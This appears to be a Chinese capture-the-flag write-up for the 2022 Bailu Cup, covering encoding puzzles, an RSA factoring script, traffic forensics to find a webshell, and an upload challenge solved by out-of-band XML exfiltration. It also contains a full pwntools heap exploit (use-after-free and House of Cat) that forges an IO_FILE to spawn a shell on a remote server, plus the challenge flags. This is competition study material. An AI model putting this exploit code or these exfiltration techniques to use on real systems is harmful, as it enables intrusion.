2022柏鹭杯 | 风尘孤狼
0%

2022柏鹭杯

微信图片_20220915174433

前言

image-20220915173056214

每次打比赛钱都与我无瓜,有证书就行

问题描述的密文你会解密吗?

Base92+base64

flag{ISEC-Welc48923BDKfbf3u3jmlvjf3b2CUOX2}

Can you help us decrypt this text?

Hex转str+url解码+base16+hex转str+rot47

flag{ISEC-mAVxzP_4AdUtZ7kps_Mfc3@N5pnSHt9Q}

Anti-Fermat?

p、q生成不当,求近似值,爆破知道n%p==0

脚本如下

from Crypto.Util.number import *

import gmpy2

n= 0x1ffc7dc6b9667b0dcd00d6ae92fb34ed0f3d84285364c73fbf6a572c9081931be0b0610464152de7e0468ca7452c738611656f1f9217a944e64ca2b3a89d889ffc06e6503cfec3ccb491e9b6176ec468687bf4763c6591f89e750bf1e4f9d6855752c19de4289d1a7cea33b077bdcda3c84f6f3762dc9d96d2853f94cc688b3c9d8e67386a147524a2b23b1092f0be1aa286f2aa13aafba62604435acbaa79f4e53dea93ae8a22655287f4d2fa95269877991c57da6fdeeb3d46270cd69b6bfa537bfd14c926cf39b94d0f06228313d21ec6be2311f526e6515069dbb1b06fe3cf1f62c0962da2bc98fa4808c201e4efe7a252f9f823e710d6ad2fb974949751

c = 0x60160bfed79384048d0d46b807322e65c037fa90fac9fd08b512a3931b6dca2a745443a9b90de2fa47aaf8a250287e34563e6b1a6761dc0ccb99cb9d67ae1c9f49699651eafb71a74b097fc0def77cf287010f1e7bd614dccfb411cdccbb84c60830e515c05481769bd95e656d839337d430db66abcd3a869c6348616b78d06eb903f8abd121c851696bd4cb2a1a40a07eea17c4e33c6a1beafb79d881d595472ab6ce3c61d6d62c4ef6fa8903149435c844a3fab9286d212da72b2548f087e37105f4657d5a946afd12b1822ceb99c3b407bb40e21163c1466d116d67c16a2a3a79e5cc9d1f6a1054d6be6731e3cd19abbd9e9b23309f87bfe51a822410a62

e=65537

t1=1<<1024

p=(2**1024+gmpy2.iroot((2**1024)**2-4*n,2)[0])//2

p=int(p)

while n%p!=0:

  p=gmpy2.next_prime(p)

q=n//p

phi=(p-1)*(q-1)

d=gmpy2.invert(e,phi)

m=pow(c,d,n)

print(long_to_bytes(m))

img

b’flag{ISEC-OyGdWk_E3gTcPtWUn_OaqD@d76xHyse1}’

请找到黑客留下的webshell

导出HTTP对象aaa.jpg

img

winhex,发现有文件路径,猜测为zip文件

img

修改后缀名,发现为加密zip文件

img

流量分析得到一个压缩包cms,需要密码,DNS查询得到解压密码

img

解压后分析发现getHigherScore.php有不可显示内容

img

最后一段提取一下然后转二进制再转十六进制再转str,得到flag

flag{ISEC-Ie33hfCuf39BCjfhrE2569vbEe4bm8Be}

复杂的溢出?

uaf+hoseofcat

Exp如下

from pwn import*
io = remote('8.130.32.86',12032)
libc = ELF("./libc.so.6")
se      = lambda data               :io.send(data) 
sa      = lambda delim,data         :io.sendafter(delim, data)
sl      = lambda data               :io.sendline(data)
sla     = lambda delim,data         :io.sendlineafter(delim, data)
rc      = lambda num                :io.recv(num)
rl      = lambda                    :io.recvline()
ru      = lambda delims             :io.recvuntil(delims)
uu32    = lambda data               :u32(data.ljust(4, b'\x00'))   
uu64    = lambda data               :u64(data.ljust(8, b'\x00'))
info    = lambda tag, addr          :log.info(tag + " -------------> " + hex(addr))
ia      = lambda                    :io.interactive()
def add(index,size,content):
   sla("> ","1")
   sla('> ',str(index))
   sla("> ",str(size))
   sla('Enter content: ',content)
def free(index):
   sla("> ","2")
   sla("> ",str(index))
def show(index):
   sla("> ","3")
   sla('> ',str(index))
for i in range(9):
   add(i,0x1a0,"aaa")
add(9,0x20,"bbb")
free(0)
show(0)
key = uu64(io.recv(5))
info("key",key)
for i in range(1,7):
   free(i)
heap_addr = key << 12 
free(8)
show(8)

libcbase = uu64(io.recv(6)) - 2202848
info("libcbase",libcbase)
system_addr = libcbase + libc.sym["system"]
info("system",system_addr)
free(7)
add(0,0x1a0,"aaaa")
free(8)

stdout_addr = libcbase +2205568
info("stdout_addr",stdout_addr)
fake_IO_FILE = "/bin/sh\x00"+p64(0)+p64(0)+p64(0)
fake_IO_FILE +=p64(0)
fake_IO_FILE +=p64(heap_addr)
fake_IO_FILE +=p64(1)+p64(0)
fake_IO_FILE +=p64(heap_addr)#rdx
fake_IO_FILE +=p64(system_addr)#call addr
fake_IO_FILE +=p64(system_addr+0x100)
fake_IO_FILE = fake_IO_FILE.ljust(0x48, '\x00')
fake_IO_FILE += p64(0 )  # _chain
fake_IO_FILE = fake_IO_FILE.ljust(0x88, '\x00')
fake_IO_FILE += p64(libcbase+2210416)  # _lock = writable address
fake_IO_FILE = fake_IO_FILE.ljust(0xa0, '\x00')
fake_IO_FILE +=p64(stdout_addr+0x30) #rax1
fake_IO_FILE = fake_IO_FILE.ljust(0xc0, '\x00')
fake_IO_FILE += p64(0)  # _mode = 0
fake_IO_FILE = fake_IO_FILE.ljust(0xd8, '\x00')
fake_IO_FILE += p64(libcbase+2187456+0x10+0x20)  # vtable=IO_wfile_jumps+0x10
fake_IO_FILE +=p64(0)*6
fake_IO_FILE += p64(stdout_addr+48)*3  # rax2
payload = "\x00"*0x1a0+p64(0)+p64(0x1b1)+p64((stdout_addr)^(key+1))
add(1,0x200,payload)

add(2,0x1a0,"aaa")

add(3,0x1a0,fake_IO_FILE)

ia()

img

flag{ISEC-0610e4bc3f32e43826778ac2c9c56918}

upload

dirsearch扫目录

img

Index.php存在文件上传,传xml外带,读取flag

img

img

Base64解码得到flag

flag{ISEC-704caa48f03cec8419438f36c54e0eb1}

制作不易,如若感觉写的不错,欢迎打赏